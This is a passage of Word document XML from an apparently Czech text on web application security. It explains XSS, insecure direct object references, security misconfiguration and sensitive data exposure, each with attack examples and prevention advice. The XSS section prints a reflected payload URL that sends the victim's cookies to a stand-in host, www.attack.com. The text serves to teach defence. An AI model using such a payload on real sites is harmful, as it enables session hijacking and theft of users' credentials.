        <w:t xml:space="preserve">tomu, že skript je přímo součástí napadené stránky, má přístup ke všem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, identifikátoru relace a dalším citlivým údajům uloženým v prohlížeči touto stránkou. Tento skript může přepsat HTML obsah stránky, ale také může být použit pro krádež relace (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B74E14">
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B74E14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B74E14">
        <w:t>hijacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> viz</w:t>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:t xml:space="preserve"> kapitola </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B74E14">
        <w:instrText xml:space="preserve"> REF _Ref372450248 \w \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>4.2</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007F0535">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344890"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION nLrgkRMny1T6cmvm \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[14]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc387327818"/>
      <w:r>
        <w:t>Ukázka útoku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Aplikace po zadání textu do vyhledávacího pole vypisuje výsledky vyhledávání, přičemž do stránky vloží i neošetřený text zadaný uživatelem:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRPr="004B453A" w:rsidRDefault="007F5BF2" w:rsidP="009023C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;h2&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Results</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;%= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Request.QueryString.Get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A4036F">
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:t>%&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="0077747C">
      <w:r>
        <w:t xml:space="preserve">Útočník do URL parametru </w:t>
      </w:r>
      <w:r w:rsidR="0077747C">
        <w:t>„</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0077747C">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vloží škodlivý kód a odkaz pošle oběti útoku. Pokud oběť odkaz otevře, útočník získá její uložená </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (v těch se může vyskytovat i</w:t>
      </w:r>
      <w:r w:rsidR="0077747C">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>identifikátor relace):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://example.com/?search=&lt;script&gt;document.location='http://</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">www.attack.com/record?cookies='+document.cookie;&lt;/sript&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc387327819"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRPr="00BA4642" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Před tím, než se jakýkoliv uživatelský vstup stane součástí obsahu stránky, je nutné jej validovat nebo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>escapovat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Nejedná se pouze o vstup, který by byl přímo vypisován, jak je uvedeno v příkladu, ale také o veškeré hodnoty formulářových prvků, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0A9F">
        <w:t>skrytých polí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> apod.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRPr="00B90B6C" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V případě, že je nutné umožnit uživatelům vytvářet přímo obsah stránky (například autorům v publikačním systému, kteří vytváří přímo HTML kód), tak je dobré alespoň filtrovat značky umožňující vložení spustitelného kódu, jako jsou </w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>embded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>applet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004A78A4">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>apod.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRPr="007F0535" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Při ukládání citlivých údajů</w:t>
      </w:r>
      <w:r w:rsidR="0077747C">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>jako je například identifikátor relace</w:t>
      </w:r>
      <w:r w:rsidR="0077747C">
        <w:t xml:space="preserve">) do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0077747C">
        <w:t>cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0077747C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je možné nastavit ukládané </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vlastnost </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0077747C">
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, nebude potom dostupná klientským skriptům.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F0535" w:rsidRPr="007F0535" w:rsidRDefault="004D2639" w:rsidP="007F0535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344902"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 9 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 9]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc372462429"/>
      <w:bookmarkStart w:id="82" w:name="_Toc387327820"/>
      <w:r>
        <w:t>Nezabezpečená přímá reference objektů</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t xml:space="preserve">Webové aplikace běžně používají hodnoty databázových klíčů jako referenci na uložené objekty. Ne vždy však kontrolují, </w:t>
      </w:r>
      <w:r w:rsidR="0077747C">
        <w:t>zda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> má daný uživatel právo pracovat s konkrétním objektem. Typickým příkladem tohoto přístupu je například situace, kdy má uživatel k</w:t>
      </w:r>
      <w:r w:rsidR="0077747C">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>dispozici seznam objektů, které může upravit (ze všech uložených objektů se filtrují jen ty, na které má uživatel oprávnění) a po zvolení konkrétního objektu je přesměrován na editační formulář, kterému je předán klíč zvoleného objektu. Tento formulář už ale nekontroluje</w:t>
      </w:r>
      <w:r w:rsidR="0077747C">
        <w:t xml:space="preserve"> oprávnění </w:t>
      </w:r>
      <w:r>
        <w:t>uživatel</w:t>
      </w:r>
      <w:r w:rsidR="0077747C">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pracovat s předaným objektem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc387327821"/>
      <w:r>
        <w:t>Ukázka útoku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Editační formulář slouží k úpravě objektu, jehož klíč je předán URL parametrem "id". Útočník získá adresu tohoto formuláře (například tím, že upravuje objekt, na který má práva) a změní hodnotu parametru "id", čímž se dostane k datům objektu, ke kterému nemá mít přístup.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc387327822"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Před tím, než dojde k načtení objektu, je nutné zkontrolovat, jestli má uživatel právo s objektem pracovat. Nelze spoléhat na to, že se dané stránce předává správný identifikátor a že uživatelovo oprávnění již bylo ověřeno na předchozí stránce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nepoužívat přímou referenci objektů pomocí snadno odhadnutelných identifikátorů jako je databázový primární klíč, místo něj například použít </w:t>
      </w:r>
      <w:r w:rsidRPr="0061378D">
        <w:t>GUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nebo nepřímou referenci specifickou pro přihlášeného uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061378D" w:rsidRDefault="004D2639" w:rsidP="0061378D">
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344903"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 10 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 10]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkStart w:id="85" w:name="_Toc372462430"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="0061378D">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc387327823"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Špatná konfigurace zabezpečení</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t xml:space="preserve">Chyby v zabezpečení mohou vzniknout na jakékoliv aplikační úrovni, zahrnujíce platformu, webový server, aplikační server, databázi, použitý </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0061378D">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a vlastní kód aplikace. Problémem je neaktualizovaný software, zbytečné aktivní služby, nezabezpečený přístup k souborovému systému, nesmazané výchozí účty, ukázkové aplikace nebo testovací data, zapnutý ladící režim apod.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc387327824"/>
      <w:r>
        <w:t>Ukázka útoku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Administrativní konzole aplikačního serveru je nainstalována automaticky a není nikdy použita, ale ani odinstalována. Útočník na serveru objeví standardní administrační rozhraní a zkusí se přihlásit s výchozím účtem, což bude úspěšné a</w:t>
      </w:r>
      <w:r w:rsidR="0061378D">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>získává přístup k serveru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Na serveru je povolené procházení obsahu složek. Útočník si postupně stáhne obsah složek, kde je dostupný i kód aplikace (v případě jeho zkompilované verze může útočník použít </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dekompilátor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). Po prostudování kódu aplikace objeví bezpečnostní chybu, kterou zneužije.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Je zapnutý ladící mód aplikace, útočník tedy dostává k dispozici pro něj důležité informace o architektuře aplikace, schématu databáze apod., díky čemuž jednodušeji objeví zranitelnosti aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Na serveru jsou nainstalované ukázkové aplikace, které mají známé bezpečnostní chyby, těch může útočník snadno využít.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc387327825"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vždy používat aktuální software, ať už jde o operační systém serveru, webový server, platformu, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0061378D">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nebo komponenty třetích stran.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="0061378D" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deaktivovat</w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>veškerou</w:t>
      </w:r>
      <w:r w:rsidR="007F5BF2">
        <w:t xml:space="preserve"> nepotřebnou funkcionalitu (otevřené porty, běžící služby, nepoužívané administrativní stránky a účty).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Smazat nebo deaktivovat výchozí administrátorské účty.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vypnout ladící režim a v příp</w:t>
      </w:r>
      <w:r w:rsidR="0061378D">
        <w:t xml:space="preserve">adě chyby nezobrazovat zbytečné </w:t>
      </w:r>
      <w:r>
        <w:t>podrobnosti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Zkontrolovat bezpečnostní nastavení použité platformy a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0061378D">
        <w:t>frameworku</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F0535" w:rsidRDefault="004D2639" w:rsidP="007F0535">
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344904"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 11 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 11]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc372462431"/>
      <w:bookmarkStart w:id="90" w:name="_Toc387327826"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Únik citlivých dat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Většina aplikací uchovává alespoň nějaké citlivé údaje o svých uživatelích, ať už se jedná o jejich přihlašovací údaje, telefonní čísla</w:t>
      </w:r>
      <w:r w:rsidR="00E97C30">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> emailové adresy nebo čísla platebních karet. Pokud útočník získá přístup k těmto datům, tak mohou být velmi snadno zneužita. Například </w:t>
      </w:r>
      <w:r w:rsidR="00E97C30">
        <w:t>když</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uživatel </w:t>
      </w:r>
      <w:r w:rsidR="00E97C30">
        <w:t>použív</w:t>
      </w:r>
      <w:r w:rsidR="00364AB7">
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pro přístup k aplikac</w:t>
      </w:r>
